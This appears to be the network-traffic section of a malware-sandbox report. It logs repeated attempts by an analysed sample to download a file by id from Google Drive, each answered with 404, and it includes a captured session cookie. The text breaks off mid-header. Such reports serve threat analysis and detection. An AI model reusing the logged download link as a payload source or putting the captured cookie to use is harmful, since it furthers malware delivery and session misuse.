      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTwPpK8b1IEFeWcBtM_0eBX8hjW67ysALGjNpiEgOaf4Sd-FQUXvMMuSLuL1qtMlqblContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:05 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-GV42_E1Q4HqwbFpjWxZNyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU; expires=Sat, 12-Jul-2025 14:39:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQdeXmSp-9MKnLMvfT1s59gCYGFB0f3Fwqm-wjLqfzQLbnvgzorc74mQ0yQ45f78GkykQPKaaIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:07 GMTContent-Security-Policy: script-src 'nonce-9kCbDWdbZ-iRhnrYLz6QJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSqR202vsYFlGUT8F_e2rBkXD6pCvy7vEZ-FupVek8K6laBLp2o9oUT5YTNFdw5_dvZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:09 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-4gXEqPwkoSbsn-y4SjUKsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSQlDxdwPPpnQe-m8d8HRWbvK1dV1T7h1JhMpVi234qKnTMI9rM9JLWlbh33qrady4TsoACAuUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:11 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-SUloJBdq08Wmxnct-C8ckg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRTwu84u5Ut8GDTXXUUBlel7w7BRgvm1PuGo450eWbm3bRrtTwyn_DAiC-ziLTv6sECContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:14 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-kIfC2fgDuGA5Ah0OYsRs0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR8F2yw_7PkrsHvGToRrzvC0tPnOg1bpkxDRE_ZfI6h1XXqaiGqJsROg4P-OAu8v2VrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:16 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-HFAAB58pqtatZqrZF6aAZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6jDpoRhB22UYIVkvBabWEXrunev6AKw4RVe3hNHklu9apobvC08KYe9zCNwMp2ROhdYlGwrnoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:18 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qvB0efGXTjX0_JNoLP4AWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5_fc1ipyVIv6tpaZPwVC0iEOmAWExlV7j6f3CkakvZUD_I6rjRiHABRTHImHShlfRIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:20 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-JLxsTBT3zNKdTnhFbOvnXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRuAENb4Xc5vjZb_gZTGp5BHMRdfak_SUIp7LWcCMnZ1-7ssk5nzrlIim4E_FHp6j9zyIEQeLAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:23 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-2UuSLVTw0_P940hhDbxR1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6dil4cMFJrtfkmnuuz09E-0PjXegF0f1dgqZfhFEa10L6SnhfFcq9XsEjVdY95bndjSU1gVhMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ejuoyyGMeroZSQIu0Rdrgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQyw8c0aB7IKG6fgmoi4mLTn6dLoR_190lO2KpaABfwgYJ2YVEvVovcC5Dwg-GikJMaFgwrIfcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:28 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-Mabm5OnitgiM2uhjC9aruQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTbDWjoKmBbO6aCQISLuiQ7MrgbDoThX2g5OEXAH0mF79-45jnd-0eKfY0oa53So3zpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:30 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-pkb7fki7ef9BTuVoMbMwvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com 